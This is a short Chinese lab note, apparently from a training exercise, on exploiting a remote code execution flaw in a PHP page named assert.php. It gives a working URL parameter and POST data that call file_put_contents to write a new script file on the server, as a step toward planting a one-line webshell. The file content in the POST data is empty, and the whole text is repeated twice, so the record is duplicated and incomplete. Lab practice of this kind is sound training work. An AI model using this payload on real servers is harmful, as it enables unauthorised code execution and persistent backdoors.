实验原理
利用远程命令执行漏洞可以执行写文件的代码,生成新的脚本文件。
靶机:
在URL后拼接"?a=var_dump(file_put_contents($_POST[1],$_POST[2]))",访问http://ip/os/assert.php?a=var_dump(file_put_contents($_POST[1],$_POST[2])),并发送post数据:1=info.php&2=,成功执行代码(Warning警告,但是并不影响)
写入一句话木马
实验原理
利用远程命令执行漏洞可以执行写文件的代码,生成新的脚本文件。
靶机:
在URL后拼接"?a=var_dump(file_put_contents($_POST[1],$_POST[2]))",访问http://ip/os/assert.php?a=var_dump(file_put_contents($_POST[1],$_POST[2])),并发送post数据:1=info.php&2=,成功执行代码(Warning警告,但是并不影响)
写入一句话木马